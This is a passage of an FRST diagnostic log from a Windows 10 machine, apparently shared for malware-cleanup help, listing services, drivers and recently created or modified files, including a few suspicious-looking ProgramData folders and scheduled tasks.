    R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
    R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
    R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
    R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
    R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
    R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
    R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
    S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
    S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
    S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
    R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
    R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
    R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
    R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
    R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
    S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
    R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
    R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
    R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
    R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
    S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
    S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
    S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
    R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
    R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
    R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
    S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
    S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
    R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
    R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
    R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
    S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
    S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
    R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
    R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
    U3 idsvc; no ImagePath
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
    U3 wpcsvc; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-02-29 20:46 - 2016-02-29 20:46 - 00028580 _____ C:\Users\Kym\Desktop\FRST.txt
    2016-02-29 20:43 - 2016-02-29 20:46 - 00000000 ____D C:\FRST
    2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
    2016-02-29 20:38 - 2016-02-29 20:40 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
    2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
    2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
    2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
    2016-02-29 20:32 - 2016-02-29 20:32 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
    2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
    2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
    2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
    2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
    2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
    2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
    2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
    2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
    2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
    2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
    2016-02-21 16:39 - 2016-02-21 16:39 - 00000000 ____D C:\ProgramData\0342bcb1-0de3-0
    2016-02-21 16:34 - 2016-02-21 16:34 - 00003878 _____ C:\WINDOWS\System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}
    2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\3c355888
    2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\0342bcb1-60e1-0
    2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{21b5474a-312c-0}
    2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{0b5d3910-112c-1}
    2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
    2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
    2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
    2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
    2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
    2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
    2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
    2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
    2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
    2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
    2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
    2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
    2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
    2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
    2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
    2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
    2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
    2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
    2016-02-06 01:02 - 2016-02-28 20:24 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\uTorrent
    2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
    2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
    2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
    2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
    2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-02-29 20:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-02-29 20:37 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-02-29 20:37 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
    2016-02-29 20:35 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
    2016-02-29 20:32 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
    2016-02-29 20:32 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2016-02-29 20:32 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-02-29 20:32 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
    2016-02-29 20:32 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-02-29 20:31 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-02-29 19:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-02-28 21:23 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
    2016-02-28 18:06 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
    2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
    2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
    2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
    2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
    2016-02-25 23:16 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
    2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
    2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
    2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-45f1-1
    2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-3475-0
    2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
    2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
    2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
    2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
    2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
    2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
    2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
    2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
    2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
    2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
    2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
    2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
    2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
    2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
    2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
    2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
    2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
    2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
    2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
    2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
    2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

    ==================== Files in the root of some directories =======

    2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
    2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
    2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
    2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
    2015-05-21 11:30 - 2015-05-21 11:31 - 0001062 _____ () C:\Users\Kym\AppData\Roaming\SpeedRunnersLog.txt
    2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
    2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
    2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
    2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Files to move or delete:
    ====================
    C:\Users\Kym\IP_Log_Data.js
    C:\Users\Kym\Network_Meter_Data.js


    Some files in TEMP:
    ====================
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
